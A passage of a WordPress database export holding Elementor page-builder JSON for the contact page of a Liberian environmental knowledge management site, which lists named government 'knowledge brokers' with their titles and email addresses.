"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong><br>\\n\\nMEAs Officer, EPA<br>\\n\\nUNCBD Focal Point<br>\\n\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"643defa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Benjamin Karmorh<\\/strong><br>\\n\\nMEAs Coordinator, EPA<br>\\n\\nUNFCCC Focal Point<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"98a945e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Berexford S. Jallah<\\/strong><br>\\nGIS Coordinator, EPA<br>\\nUNCCD Focal Point<br>\\n<a href=\\\"mailto:bjallah@epa.gov.lr\\\">bjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong>\\n\\nCoordinator Climate Change Secretariat, EPA\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46e908a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong><br>\\n\\nManager, Compliance and Enforcement, EPA<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65f189c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Kawusu Toure<\\/strong><br>\\nAssistant Manager, ESIA, EPA<br>\\n<a href=\\\"mailto:kawumtoure@gmail.com\\\">kawumtoure@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2d79ff\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f970049\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239344d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6ab7cf6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(15978,2416,'_elementor_edit_mode','builder'),(15979,2416,'_elementor_template_type','wp-page'),(15980,2416,'_elementor_version','2.7.5'),(15981,2416,'_wp_page_template','default'),(15982,2416,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"aa147aa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact Form Coming up\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-k